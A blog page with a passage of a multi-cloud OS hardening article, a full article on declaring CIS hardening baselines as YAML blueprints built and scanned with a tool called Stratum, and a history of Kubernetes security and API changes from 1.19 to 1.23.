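The translation described above can be pictured as a lookup from provider to device name. This is a hypothetical sketch, not Stratum’s implementation: the function name `tmp_fstab_entry`, the `ext4` filesystem, and the choice of device per provider (taken from the AWS and GCP example earlier in this episode) are all assumptions for illustration.

```shell
#!/bin/sh
# Hypothetical sketch: turn one portable declaration ("/tmp is a separate,
# restricted mount") into a provider-specific /etc/fstab line.
tmp_fstab_entry() {
  case "$1" in
    aws) dev=/dev/xvdb ;;   # device names follow the example in this episode
    gcp) dev=/dev/sdb ;;
    *)   echo "unsupported provider: $1" >&2; return 1 ;;
  esac
  # nodev,nosuid,noexec are the mount restrictions the /tmp controls check for;
  # ext4 is an assumption made for this sketch.
  printf '%s /tmp ext4 defaults,nodev,nosuid,noexec 0 2\n' "$dev"
}

tmp_fstab_entry aws
tmp_fstab_entry gcp
```

An unknown provider fails loudly instead of falling back to a default device, which is the behavior the silent-fstab incident above was missing.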

Cloud-init ordering:

Different providers initialize services in different orders. On AWS, the network is available before cloud-init runs most tasks. On GCP, some network configuration happens after cloud-init starts. On Azure, the waagent handles some configuration that cloud-init handles elsewhere.

The provider layer sequences the hardening steps to run in the correct order for each provider — specifically, it waits for network availability before applying network-level hardening, and ensures the package manager is configured before running Ansible roles that require package installation.
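
Waiting for a precondition before a hardening step can be sketched as a small retry helper. This is an illustrative pattern only, assuming a hypothetical `wait_for` function and environment variables `WAIT_ATTEMPTS` and `WAIT_DELAY`; how Stratum’s provider layer actually sequences steps is not shown in this series.

```shell
#!/bin/sh
# wait_for CMD [ARGS...]: re-run a readiness check until it succeeds or the
# attempt budget is used up. Returns 0 on success, 1 on timeout.
wait_for() {
  attempts=${WAIT_ATTEMPTS:-30}
  delay=${WAIT_DELAY:-2}
  i=0
  while [ "$i" -lt "$attempts" ]; do
    if "$@"; then
      return 0
    fi
    i=$((i + 1))
    sleep "$delay"
  done
  return 1
}

# Trivial demonstration: "true" stands in for a real readiness check,
# such as a DNS lookup or a package-manager lock test.
if wait_for true; then
  echo "precondition met, safe to run the next hardening step"
fi
```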

Metadata endpoint configuration:

CIS controls include restrictions on access to the instance metadata service (IMDSv2 enforcement on AWS, equivalent controls on GCP/Azure). The provider layer applies the correct restriction for each cloud — the blueprint just declares compliance: benchmark: cis-l1.


Building for All Providers Simultaneously

For fleet standardization, you can build all providers in a single operation:

# Build for all providers in parallel
stratum build \
  --blueprint ubuntu22-cis-l1.yaml \
  --provider aws,gcp,azure

# Output:
# [aws]   Launching build instance in ap-south-1...
# [gcp]   Launching build instance in asia-south1...
# [azure] Launching build instance in southindia...
# ...
# [aws]   Grade: A (98/100) — ami-0a7f3c9e82d1b4c05
# [gcp]   Grade: A (98/100) — projects/my-project/global/images/ubuntu22-cis-l1-20260419
# [azure] Grade: A (98/100) — /subscriptions/.../images/ubuntu22-cis-l1-20260419

All three builds run in parallel. All three images carry identical compliance grades. The GCP and Azure image names embed the blueprint name and build date for easy identification.


Blueprint Versioning and Drift Detection

Version-controlling the blueprint file solves a problem that multi-cloud environments hit consistently: knowing what your OS security posture was six months ago.

# Check the current state of a fleet instance against the blueprint
stratum scan --instance i-0abc123 --blueprint ubuntu22-cis-l1.yaml

# Compare against original build grade
# Output:
# Instance: i-0abc123 (aws, ap-south-1)
# Original grade (build): A (98/100) — 2026-01-15
# Current grade (scan):   B (89/100) — 2026-04-19
# 
# Drifted controls (9):
#   3.3.2  — TCP SYN cookies: FAIL (sysctl net.ipv4.tcp_syncookies=0)
#   5.3.2  — sudo log_input: FAIL (removed from /etc/sudoers.d/)
#   ...

Drift detection compares the current instance state against the blueprint that built it. Controls that passed at build time and now fail indicate configuration drift — something changed after the image was deployed. This is how you find the three instances that a sysadmin “temporarily” modified and never reverted.
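
The comparison itself is a join between two result sets. A minimal sketch, assuming a hypothetical `control_id result` text format with one control per line; this is not the native output of Stratum or OpenSCAP, and `drifted_controls` is an illustrative name.

```shell
#!/bin/sh
# drifted_controls BUILD_RESULTS CURRENT_RESULTS
# Prints the IDs of controls that passed at build time and fail now.
drifted_controls() {
  awk '
    NR == FNR { build[$1] = $2; next }                  # first file: build-time results
    build[$1] == "pass" && $2 == "fail" { print $1 }    # second file: current scan
  ' "$1" "$2"
}

# Example with illustrative results
demo=$(mktemp -d)
printf '%s\n' '3.3.2 pass' '5.3.2 pass' '1.1.1 fail' > "$demo/build.txt"
printf '%s\n' '3.3.2 fail' '5.3.2 pass' '1.1.1 fail' > "$demo/current.txt"
drifted_controls "$demo/build.txt" "$demo/current.txt"   # prints: 3.3.2
rm -rf "$demo"
```

A control that failed at build time and still fails is not drift; it is a known gap, which is why the sketch only reports pass-to-fail transitions.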


Production Gotchas

Provider-specific CIS controls exist. CIS AWS Foundations Benchmark and CIS GCP Benchmark include cloud-specific controls (VPC flow logs, CloudTrail, etc.) that are separate from the OS-level CIS controls. The blueprint handles OS-level controls. Cloud-level controls (IAM, logging, network configuration) belong in your cloud security posture management tooling.

Build costs vary by provider. On AWS, the build instance is a t3.medium for 15–20 minutes (~$0.02). On GCP and Azure, equivalent pricing applies. For multi-provider builds, run them in regions close to your primary workloads to minimize image transfer time.

Proxmox builds require a local Stratum agent. Unlike the cloud providers, a Proxmox host’s API is usually not reachable from outside your own network. The Proxmox provider therefore requires the Stratum agent running on the Proxmox host. The build process and blueprint format are identical; only the network topology differs.

GCP image sharing across projects requires explicit IAM. GCP machine images aren’t automatically available to other projects in the organization. After building, either configure sharing at the organization level or run:

stratum image share --provider gcp --image ubuntu22-cis-l1-20260419 --projects


Key Takeaways

  • Multi-cloud OS hardening with separate scripts per provider creates inevitable drift; a provider-abstracted blueprint eliminates it
  • The same HardeningBlueprint YAML builds on AWS, GCP, Azure, DigitalOcean, Linode, and Proxmox — the compliance intent is in the file, the provider details are in Stratum’s provider layer
  • Parallel multi-provider builds produce images with identical compliance grades on the same schedule
  • Drift detection works fleet-wide: any instance on any provider can be rescanned against the blueprint that built it
  • Blueprint version control is the single source of truth for OS security posture history — what was true on any given date, across any provider

What’s Next

One blueprint, six clouds, identical compliance grades. EP03 showed that the multi-cloud drift problem disappears when provider details are abstracted away from the blueprint.

What neither EP02 nor EP03 answered is the auditor’s question: how do you know the image is actually compliant? “We ran CIS L1” is not an answer. “Grade A, 98/100 controls, SARIF export attached” is.

EP04 covers automated OpenSCAP compliance: the post-build scan in detail — how the A-F grade is calculated, what controls block an A grade, how SARIF exports work, and how drift detection catches what changed after deployment.

Next: automated OpenSCAP compliance — CIS benchmark grading before deployment


Hardening Blueprint as Code — Declare Your OS Baseline in YAML

Reading Time: 6 minutes

OS Hardening as Code, Episode 2
Cloud AMI Security Risks · Linux Hardening as Code


TL;DR

  • A hardening runbook is a list of steps someone runs. A HardeningBlueprint YAML is a build artifact — if it wasn’t applied, the image doesn’t exist
  • Linux hardening as code means declaring your entire OS security baseline in a single YAML file and building it reproducibly across any provider
  • stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws either produces a hardened image or fails — there is no partial state
  • The blueprint includes: target OS/provider, compliance benchmark, Ansible roles, and per-control overrides with documented reasons
  • One blueprint file = one source of truth for your hardening posture, version-controlled and reviewable like any other infrastructure code
  • Post-build OpenSCAP scan runs automatically — the image only snapshots if it passes

The Problem: A Runbook That Gets Skipped Once Is a Runbook That Gets Skipped

Hardening runbook
       │
       ▼
  Human executes
  steps manually
       │
       ├─── 47 deployments: followed correctly
       │
       └─── 1 deployment at 2am: step 12 skipped
                    │
                    ▼
           Instance in production
           without audit logging,
           SSH password auth enabled,
           unnecessary services running

Linux hardening as code eliminates the human decision point. If the blueprint wasn’t applied, the image doesn’t exist.

EP01 showed that default cloud AMIs arrive pre-broken — unnecessary services, no audit logging, weak kernel parameters, SSH configured for convenience not security. The obvious response is a hardening script. But a script run by a human is still a process step. It can be skipped. It can be done halfway. It can drift across different engineers who each interpret “run the hardening script” slightly differently.


A production deployment last year. The platform team had a solid CIS L1 hardening runbook — 68 steps, well-documented, followed consistently. Then a critical incident at 2am required three new instances to be deployed on short notice. The engineer on call ran the provisioning script and, under pressure, skipped the hardening step with the intention of running it the next morning.

They didn’t. The three instances stayed in production unhardened for six weeks before an automated scan caught them. Audit logging wasn’t configured. SSH was accepting password authentication. Two unnecessary services were running that weren’t in the approved software list.

Nothing was breached. But the finding went into the next compliance report as a gap, the team spent a week remediating, and the post-mortem conclusion was “we need better runbook discipline.”

That’s the wrong conclusion. The runbook isn’t the problem. The problem is that hardening was a process step instead of a build constraint.


What Linux Hardening as Code Actually Means

Linux hardening as code is the same principle as infrastructure as code applied to OS security posture: the desired state is declared in a file, the file is the source of truth, and the execution is deterministic and repeatable.

HardeningBlueprint YAML
         │
         ▼
  stratum build
         │
  ┌──────┴──────────────────┐
  │  Provider Layer          │
  │  (cloud-init, disk       │
  │   names, metadata        │
  │   endpoint per provider) │
  └──────┬──────────────────┘
         │
  ┌──────┴──────────────────┐
  │  Ansible-Lockdown        │
  │  (CIS L1/L2, STIG —      │
  │   the hardening steps)   │
  └──────┬──────────────────┘
         │
  ┌──────┴──────────────────┐
  │  OpenSCAP Scanner        │
  │  (post-build verify)     │
  └──────┬──────────────────┘
         │
         ▼
  Golden Image (AMI/GCP image/Azure image)
  + Compliance grade in image metadata

The YAML file is what you write. Stratum handles the rest.


The HardeningBlueprint YAML

The blueprint is the complete, auditable declaration of your OS security posture:

# ubuntu22-cis-l1.yaml
name: ubuntu22-cis-l1
description: Ubuntu 22.04 CIS Level 1 baseline for production workloads
version: "1.0"

target:
  os: ubuntu
  version: "22.04"
  provider: aws
  region: ap-south-1
  instance_type: t3.medium

compliance:
  benchmark: cis-l1
  controls: all

hardening:
  - ansible-lockdown/UBUNTU22-CIS
  - role: custom-audit-logging
    vars:
      audit_log_retention_days: 90
      audit_max_log_file: 100

filesystem:
  tmp:
    type: tmpfs
    options: [nodev, nosuid, noexec]
  home:
    options: [nodev]

controls:
  - id: 1.1.2
    override: compliant
    reason: "tmpfs /tmp implemented via systemd unit — equivalent control"
  - id: 5.2.4
    override: compliant
    reason: "SSH timeout managed by session manager policy, not sshd_config"

Each section is explicit:

target — which OS, which version, which provider. This is the only provider-specific section. The compliance intent below it is portable.

compliance — which benchmark and which controls to apply. controls: all means every CIS L1 control. You can also specify controls: [1.x, 2.x] to scope to specific sections.

hardening — which Ansible roles to run. ansible-lockdown/UBUNTU22-CIS is the community CIS hardening role. You can add custom roles alongside it.

controls — documented exceptions. Not suppressions — overrides with a recorded reason. This is the difference between “we turned off this control” and “this control is satisfied by an equivalent implementation, documented here.”
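To make the role of each section concrete, here is a small Python sketch of the kind of structural check a validator might perform on a parsed blueprint. It is an assumption-laden illustration: the set of required sections and the function validate_blueprint are hypothetical, and the blueprint is shown as an already-parsed dictionary rather than loaded from YAML.

```python
# Hypothetical: which top-level sections a blueprint must declare.
REQUIRED_SECTIONS = ("name", "target", "compliance", "hardening")


def validate_blueprint(blueprint):
    """Return a list of human-readable problems; an empty list means valid."""
    problems = []
    for section in REQUIRED_SECTIONS:
        if section not in blueprint:
            problems.append(f"missing section: {section}")
    # Every override must carry a non-empty, recorded reason.
    for override in blueprint.get("controls", []):
        control_id = override.get("id", "<no id>")
        if not str(override.get("reason", "")).strip():
            problems.append(f"override {control_id} has no documented reason")
    return problems


blueprint = {
    "name": "ubuntu22-cis-l1",
    "target": {"os": "ubuntu", "version": "22.04", "provider": "aws"},
    "compliance": {"benchmark": "cis-l1", "controls": "all"},
    "hardening": ["ansible-lockdown/UBUNTU22-CIS"],
    "controls": [
        {"id": "1.1.2", "override": "compliant",
         "reason": "tmpfs /tmp implemented via systemd unit"},
        {"id": "5.2.4", "override": "compliant"},  # reason deliberately missing
    ],
}

print(validate_blueprint(blueprint))
```

The point of the second loop is the distinction drawn above: an override without a reason is a suppression, so the sketch treats it as a validation error.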


Building the Image

# Validate the blueprint before building
stratum blueprint validate ubuntu22-cis-l1.yaml

# Build — this will take 15-20 minutes
stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws

# Output:
# [15:42:01] Launching build instance...
# [15:42:45] Running ansible-lockdown/UBUNTU22-CIS (144 tasks)...
# [15:51:33] Running custom-audit-logging role...
# [15:52:11] Running post-build OpenSCAP scan (benchmark: cis-l1)...
# [15:54:08] Grade: A (98/100 controls passing)
# [15:54:09] 2 controls overridden (documented in blueprint)
# [15:54:10] Creating AMI snapshot: ami-0a7f3c9e82d1b4c05
# [15:54:47] Done. AMI tagged with compliance grade: cis-l1-A-98

If the post-build scan comes back below a configurable threshold, the build fails — no AMI is created. The instance is terminated. The image does not exist.
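The gate itself is a simple decision. The Python sketch below shows the idea under stated assumptions: the threshold is expressed as a percentage of passing controls, and both the function name should_snapshot and the value 90 are hypothetical rather than Stratum defaults.

```python
def should_snapshot(passing, total, threshold_percent):
    """Return True only when the share of passing controls meets the threshold."""
    if total <= 0:
        raise ValueError("total must be positive")
    # Integer comparison avoids floating-point rounding at the boundary.
    return passing * 100 >= threshold_percent * total


# Hypothetical threshold of 90 percent.
print(should_snapshot(98, 100, 90))
print(should_snapshot(85, 100, 90))
```

When the function returns False, the build pipeline would terminate the instance without creating an image, which is what makes the hardening a build constraint rather than a process step.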

That is the structural guarantee. You cannot skip a build step at 2am because at 2am you’re calling stratum build, not running steps manually.


The Control Override Mechanism

The override mechanism is what separates this from checkbox compliance.

Every security benchmark has controls that conflict with how production environments actually work. CIS L1 recommends /tmp on a separate partition. Many cloud instances use tmpfs with equivalent nodev, nosuid, noexec mount options. The intent of the control is satisfied. The literal implementation differs.

Without an override mechanism, you have two bad options: fail the scan (noisy, meaningless), or configure the scanner to ignore the control (undocumented, invisible to auditors).

The blueprint’s controls section gives you a third option: record the override, document the reason, and let the scanner count it as compliant. The SARIF output and the compliance grade both reflect the documented state.

controls:
  - id: 1.1.2
    override: compliant
    reason: "tmpfs /tmp implemented via systemd unit — equivalent control"

This appears in the build log, in the SARIF export, and in the image metadata. An auditor reading the output sees: control 1.1.2 — compliant, documented exception, reason recorded. Not: control 1.1.2 — ignored.
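As a rough Python sketch of that third option: the function below takes raw scanner results plus the blueprint's overrides and produces the effective results along with an audit note per override. The names apply_overrides, scan, and overrides are hypothetical, and this is not how Stratum necessarily implements it.

```python
def apply_overrides(scan_results, overrides):
    """Return (effective_results, audit_notes) after applying documented overrides."""
    effective = dict(scan_results)  # leave the raw scan untouched
    notes = []
    for override in overrides:
        reason = str(override.get("reason", "")).strip()
        if not reason:
            # An override without a reason would be a silent suppression.
            raise ValueError(f"override {override['id']} needs a reason")
        if override.get("override") == "compliant":
            effective[override["id"]] = "pass"
            notes.append(
                f"{override['id']}: compliant (documented exception: {reason})"
            )
    return effective, notes


scan = {"1.1.2": "fail", "5.2.4": "fail", "3.3.2": "pass"}
overrides = [
    {"id": "1.1.2", "override": "compliant",
     "reason": "tmpfs /tmp implemented via systemd unit"},
]

effective, notes = apply_overrides(scan, overrides)
print(effective)
print(notes)
```

Control 5.2.4 still fails here because it has no override; only the documented exception changes the effective result, and the note is what an auditor would read.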


What the Blueprint Gives You That a Script Doesn’t

Capability | Hardening script | HardeningBlueprint YAML
Version-controlled | Possible but not enforced | Always (it’s a file)
Auditable exceptions | Typically not | Built-in override mechanism
Post-build verification | Manual or none | Automatic OpenSCAP scan
Image exists only if hardened | No | Yes (build fails if scan fails)
Multi-cloud portability | Requires separate scripts | Provider flag, same YAML
Drift detection | Not possible | Rescan instance against original grade
Skippable at 2am | Yes | No (you’d have to change the build process)

The last row is the one that matters. A script is skippable because there’s a human in the loop. A blueprint is a build artifact — you can’t deploy the image without the blueprint having been applied, because the image is what the blueprint produces.


Validating a Blueprint Before Building

# Syntax and schema validation
stratum blueprint validate ubuntu22-cis-l1.yaml

# Dry-run — show what Ansible tasks will run, what controls will be checked
stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws --dry-run

# Show all available controls for a benchmark
stratum blueprint controls --benchmark cis-l1 --os ubuntu --version 22.04

# Show what a specific control checks
stratum blueprint controls --id 1.1.2 --benchmark cis-l1

The dry-run output shows every Ansible task that will run, every OpenSCAP check that will fire, and flags any controls that might conflict with the provider environment before you’ve launched a build instance.


Production Gotchas

Build time is 15–25 minutes. Ansible-Lockdown applies 144+ tasks for CIS L1. Build this into your pipeline timing — don’t expect golden images in 3 minutes.

Cloud-init ordering matters. On AWS, certain hardening steps (sysctl tuning, PAM configuration) interact with cloud-init. The Stratum provider layer handles sequencing — but if you add custom hardening roles, test the cloud-init interaction explicitly.

Some CIS controls conflict with managed service requirements. AWS Systems Manager Session Manager depends on the SSM Agent and outbound HTTPS connectivity, and it changes where SSH access and session timeouts are managed. Instances that talk to managed services such as RDS need specific networking settings. Use the controls override section to document these; don’t suppress them silently.

Kernel parameter hardening requires a reboot. Controls in the 3.x (network parameters) and 1.5.x (kernel modules) sections write persistent sysctl changes that are only guaranteed to be in effect once they are reloaded, most reliably by a reboot. The Stratum build process reboots the instance before the OpenSCAP scan; don’t skip the reboot if you’re building manually.


Key Takeaways

  • Linux hardening as code means the blueprint YAML is the build artifact — the image either exists and is hardened, or it doesn’t exist
  • The controls override mechanism is the difference between undocumented suppressions and auditable, reasoned exceptions
  • Post-build OpenSCAP scan runs automatically — a failing grade blocks image creation
  • One blueprint file is portable across providers (EP03 covers this): the compliance intent stays in the YAML, the cloud-specific details go in the provider layer
  • Version-controlling the blueprint gives you a complete history of what your OS security posture was at any point in time, the same way the Git history of your Terraform configuration records how infrastructure changed

What’s Next

One blueprint, one provider. EP02 showed that the skip-at-2am problem is solved when hardening is a build artifact rather than a process step.

What it didn’t address: what happens when you expand to a second cloud. GCP uses different disk names. Azure cloud-init fires in a different order. Each provider’s metadata service expects different paths and request headers. If you maintain separate hardening scripts per cloud, they drift within a month.

EP03 covers multi-cloud OS hardening: the same blueprint, six providers, no drift.

Next: multi-cloud OS hardening — one blueprint for AWS, GCP, and Azure


Security Hardens: Supply Chain, Pod Security, and the API Cleanup (2020–2022)

Reading Time: 6 minutes


Introduction

The 2020–2022 period redefined what “secure Kubernetes” meant. A global pandemic moved workloads to cloud-native infrastructure faster than security practices could follow. SolarWinds happened. Log4Shell happened. The software supply chain became a crisis.

At the same time, the Kubernetes project was doing something it had been reluctant to do: removing APIs and features, including PodSecurityPolicy — the primary security primitive that most enterprise clusters depended on. The replacement was simpler, but the migration was not.


Kubernetes 1.19 — LTS Behavior, Ingress Stable (August 2020)

1.19 extended the support window to one year (from nine months). This was an acknowledgment that enterprise organizations couldn’t upgrade four times per year — a common complaint from operations teams.

  • Ingress graduated to stable: networking.k8s.io/v1 — after years as a beta resource, Ingress finally had a stable API
  • Immutable ConfigMaps and Secrets to beta: Configuration protection becomes broadly available
  • EndpointSlices enabled by default (beta; GA followed in 1.21): The replacement for Endpoints, which shards pod-to-service mappings to avoid the single large Endpoints object that caused control plane stress at scale (10,000+ endpoints for a single service)
  • Structured logging (alpha): Machine-parseable log output from Kubernetes control plane components — a prerequisite for reliable SIEM integration
# EndpointSlice: distributed representation of service endpoints
kubectl get endpointslices -n production -l kubernetes.io/service-name=api-service
NAME                  ADDRESSTYPE   PORTS   ENDPOINTS                                   AGE
api-service-abc12     IPv4          8080    10.0.1.5,10.0.1.6,10.0.1.7 + 47 more...   2d
api-service-def34     IPv4          8080    10.0.2.1,10.0.2.2,10.0.2.3 + 47 more...   2d
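The sharding idea can be illustrated with a short Python sketch. It assumes a cap of 100 endpoints per slice (the default for the controller's max-endpoints-per-slice setting) and simply chunks a list of addresses; the real EndpointSlice controller is more careful about minimizing updates, so treat shard_endpoints as a hypothetical simplification.

```python
def shard_endpoints(addresses, max_per_slice=100):
    """Split a flat list of endpoint addresses into slices of bounded size."""
    if max_per_slice < 1:
        raise ValueError("max_per_slice must be at least 1")
    return [
        addresses[i:i + max_per_slice]
        for i in range(0, len(addresses), max_per_slice)
    ]


# 10,000 made-up pod IPs for a single large service.
addresses = [f"10.0.{i // 250}.{i % 250 + 1}" for i in range(10_000)]
slices = shard_endpoints(addresses)

print(len(slices), len(slices[0]))
```

With a single Endpoints object, one pod change means rewriting and redistributing all 10,000 entries; with slices, only the one slice containing that pod has to be updated and sent to watchers.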

Kubernetes 1.20 — Dockershim Deprecated (December 2020)

The announcement in 1.20 that the Docker shim was deprecated caused more panic than any previous Kubernetes deprecation. The message was misread by many as “Kubernetes is dropping Docker support” — the PR catastrophe that followed required the Kubernetes blog to publish a dedicated clarification post.

The reality: Docker-built images continued to work on Kubernetes. What was being removed was the code in the kubelet that talked directly to Docker’s daemon using a non-standard interface, rather than through the Container Runtime Interface (CRI). Docker images conform to the OCI (Open Container Initiative) image specification — they run on any CRI-compliant runtime.

The migration path:
  • containerd: The runtime that Docker itself used internally. Moving to containerd meant removing the Docker layer entirely; the kubelet talks directly to containerd via CRI
  • CRI-O: An OCI-focused runtime designed specifically for Kubernetes, minimal and purpose-built

# Before (Docker socket): kubelet → dockershim → Docker daemon → containerd → runc
# After (direct CRI):     kubelet → containerd → runc
#                    or:  kubelet → CRI-O → runc

# Check runtime in use on a node
kubectl get node worker-1 -o jsonpath='{.status.nodeInfo.containerRuntimeVersion}'
# containerd://1.6.4

Also in 1.20:
  • API Priority and Fairness beta: Rate-limit API server requests by priority, so that a runaway controller cannot starve other API clients
  • CronJob controller v2 (alpha): A rewritten, more scalable controller, ahead of CronJobs graduating to stable in 1.21
  • Volume snapshot stable


The SolarWinds Context (December 2020)

The SolarWinds supply chain attack, disclosed in December 2020, didn’t directly target Kubernetes. But it accelerated an existing conversation in the cloud-native community: if the build pipeline is compromised, signed binaries mean nothing. If the image registry is compromised, admission control on image names means nothing.

The attack catalyzed work on several fronts:
  • Sigstore: An open-source project (Google, Red Hat, Purdue University) for signing and verifying software artifacts including container images
  • SLSA (Supply chain Levels for Software Artifacts): A framework for incrementally improving supply chain security, from basic build provenance to hermetic builds with verified dependencies
  • SBOM (Software Bill of Materials): A machine-readable inventory of software components in an image, required by US Executive Order 14028 (May 2021) for software sold to the federal government


Kubernetes 1.21 — PodSecurityPolicy Deprecation (April 2021)

PodSecurityPolicy was deprecated in 1.21, with removal scheduled for 1.25. The deprecation was contentious: PSP was the only built-in mechanism for enforcing pod security constraints, and every security-conscious cluster depended on it, despite its many flaws.

The replacement approach: Pod Security Standards — three predefined security profiles:

Profile | Description | Use Case
Privileged | No restrictions | System-level workloads, trusted components
Baseline | Prevents known privilege escalations | General application workloads
Restricted | Hardened; follows current best practices | High-security workloads

Other 1.21 highlights:
  • CronJobs stable
  • Immutable ConfigMaps and Secrets stable
  • Graceful node shutdown beta: The kubelet gracefully terminates pods when a node shuts down (not just when the kubelet stops)
  • PodDisruptionBudget stable


Kubernetes 1.22 — The Great API Removal (August 2021)

1.22 was the most disruptive Kubernetes release for operations teams since 1.0. Several long-lived beta APIs were removed:

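Removed API | Replacement | Used By
networking.k8s.io/v1beta1 Ingress | networking.k8s.io/v1 | Every ingress resource
admissionregistration.k8s.io/v1beta1 webhook configurations | admissionregistration.k8s.io/v1 | Every admission webhook
apiextensions.k8s.io/v1beta1 CRD | apiextensions.k8s.io/v1 | Every CRD definition
rbac.authorization.k8s.io/v1beta1 | rbac.authorization.k8s.io/v1 | RBAC resources

Note that batch/v1beta1 CronJob was not part of this wave: it was deprecated once batch/v1 went stable in 1.21 and removed later, in 1.25.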

Teams with Helm charts, Terraform modules, and CI/CD pipelines built against beta API versions had to update their manifests. This was the moment that finally drove home the message: beta APIs in Kubernetes are not stable — they will be removed.
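A pre-upgrade check for this kind of removal can be sketched in Python. The sketch assumes manifests have already been parsed into dictionaries (for example by a YAML library) and covers only a handful of the API versions removed in 1.22; the table REMOVED_IN_1_22 and the function find_removed_apis are hypothetical helpers, not part of any Kubernetes tool.

```python
# Partial map of (apiVersion, kind) pairs removed in 1.22 to their replacement.
REMOVED_IN_1_22 = {
    ("networking.k8s.io/v1beta1", "Ingress"): "networking.k8s.io/v1",
    ("extensions/v1beta1", "Ingress"): "networking.k8s.io/v1",
    ("apiextensions.k8s.io/v1beta1", "CustomResourceDefinition"):
        "apiextensions.k8s.io/v1",
    ("rbac.authorization.k8s.io/v1beta1", "Role"):
        "rbac.authorization.k8s.io/v1",
    ("rbac.authorization.k8s.io/v1beta1", "ClusterRole"):
        "rbac.authorization.k8s.io/v1",
}


def find_removed_apis(manifests):
    """Return (name, old_api_version, replacement) for each affected manifest."""
    findings = []
    for manifest in manifests:
        key = (manifest.get("apiVersion"), manifest.get("kind"))
        if key in REMOVED_IN_1_22:
            name = manifest.get("metadata", {}).get("name", "<unnamed>")
            findings.append((name, key[0], REMOVED_IN_1_22[key]))
    return findings


manifests = [
    {"apiVersion": "networking.k8s.io/v1beta1", "kind": "Ingress",
     "metadata": {"name": "web"}},
    {"apiVersion": "apps/v1", "kind": "Deployment",
     "metadata": {"name": "api"}},
]

print(find_removed_apis(manifests))
```

Running a check like this against rendered Helm output in CI, before the cluster upgrade, turns a failed deployment into a failed pull request.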

Also in 1.22:
  • Server-Side Apply stable: Apply semantics moved server-side; field ownership tracking, conflict detection, and merge strategies are handled by the API server rather than client-side kubectl
  • Memory manager beta: Better NUMA-aware memory allocation for latency-sensitive workloads
  • Bound Service Account Token Volumes stable: Time-limited, audience-bound tokens for pods, replacing the long-lived, cluster-wide service account tokens that were a persistent security concern

# Bound service account token — expires, audience-restricted
# Projected volume mounts a time-limited token (default 1h expiry)
volumes:
- name: token
  projected:
    sources:
    - serviceAccountToken:
        audience: api
        expirationSeconds: 3600
        path: token

The bound token change was significant from a security perspective: previously, a service account token extracted from a pod would be valid indefinitely, for any audience. Projected tokens expire and are tied to a specific audience.
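What "expires and is tied to an audience" means in practice can be seen by looking at the token's claims. The Python sketch below decodes the payload of a JWT and checks the aud and exp claims. It is illustrative only: it does not verify the signature (the API server does that for real tokens), the demo token is fabricated and unsigned, and the helper names are hypothetical.

```python
import base64
import json
import time


def decode_jwt_payload(token):
    """Decode the payload segment of a JWT without verifying the signature."""
    payload_b64 = token.split(".")[1]
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def is_bound_and_valid(token, expected_audience, now=None):
    """True if the token names the expected audience and has not expired."""
    claims = decode_jwt_payload(token)
    now = time.time() if now is None else now
    audiences = claims.get("aud", [])
    if isinstance(audiences, str):
        audiences = [audiences]
    # A token with no exp claim is treated as unbound and rejected.
    return expected_audience in audiences and claims.get("exp", 0) > now


def _b64(obj):
    raw = json.dumps(obj).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


# Fabricated token for illustration: audience "api", fixed expiry timestamp.
demo_token = ".".join(
    [_b64({"alg": "none"}), _b64({"aud": ["api"], "exp": 1_700_003_600}), "sig"]
)

print(is_bound_and_valid(demo_token, "api", now=1_700_000_000))
print(is_bound_and_valid(demo_token, "vault", now=1_700_000_000))
print(is_bound_and_valid(demo_token, "api", now=1_700_010_000))
```

The second and third calls show the two properties the legacy tokens lacked: a token presented to the wrong audience is rejected, and so is a token presented after its expiry.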


Pod Security Admission (alpha in Kubernetes 1.22, GA in 1.25)

The replacement for PodSecurityPolicy was Pod Security Admission — an admission controller built into the API server (no webhook required) that enforces the three Pod Security Standards at the namespace level:

# Namespace-level security enforcement
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: v1.25
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: v1.25

The three modes:
  • enforce: Reject pods that violate the policy
  • audit: Allow the pod but add an audit annotation
  • warn: Allow the pod and send a warning to the client

Pod Security Admission is deliberately simpler than PSP. It does less — it enforces three fixed profiles, not arbitrary rules. For arbitrary policy, you still need OPA/Gatekeeper or Kyverno. But the simplicity means it works reliably, with no authorization edge cases.
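The interaction of the three modes can be modelled in a few lines of Python. This is a deliberately simplified sketch: it assumes a pod can be summarized by the strictest profile it satisfies, ignores the version labels and exemptions, and the function evaluate_pod is a hypothetical model rather than the admission controller's code.

```python
# Profiles ordered from least to most restrictive.
LEVELS = {"privileged": 0, "baseline": 1, "restricted": 2}


def evaluate_pod(pod_level, namespace_labels):
    """Model the outcome for a pod that satisfies at most `pod_level`."""
    outcome = {"admitted": True, "warnings": [], "audit_annotations": []}
    for mode in ("enforce", "audit", "warn"):
        required = namespace_labels.get(f"pod-security.kubernetes.io/{mode}")
        # An unset mode imposes no restriction.
        if required is None or LEVELS[pod_level] >= LEVELS[required]:
            continue
        message = f"pod violates the {required} profile"
        if mode == "enforce":
            outcome["admitted"] = False
        elif mode == "audit":
            outcome["audit_annotations"].append(message)
        else:
            outcome["warnings"].append(message)
    return outcome


labels = {
    "pod-security.kubernetes.io/enforce": "baseline",
    "pod-security.kubernetes.io/warn": "restricted",
}

print(evaluate_pod("baseline", labels))
print(evaluate_pod("privileged", labels))
```

Setting warn one level stricter than enforce, as in this example, is a common way to preview a tighter profile: baseline-compliant pods are still admitted, but their owners see what would break under restricted.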


Kubernetes 1.23 — Dual-Stack Stable, HPA v2 Stable (December 2021)

  • IPv4/IPv6 dual-stack stable: Pods and Services can have both IPv4 and IPv6 addresses — critical for organizations running mixed-stack networks or migrating from IPv4 to IPv6
  • HPA v2 stable: Horizontal Pod Autoscaler with support for multiple metrics (CPU, memory, custom metrics from Prometheus, external metrics). Scale on Prometheus metrics, not just CPU:
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: api-hpa
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: api
  minReplicas: 2
  maxReplicas: 20
  metrics:
  - type: Pods
    pods:
      metric:
        name: http_requests_per_second
      target:
        type: AverageValue
        averageValue: 1000m  # Quantity in milli-units: 1000m = 1 request/second per pod
  • FlexVolume deprecated (in favor of CSI): Another step in the driver out-of-tree migration
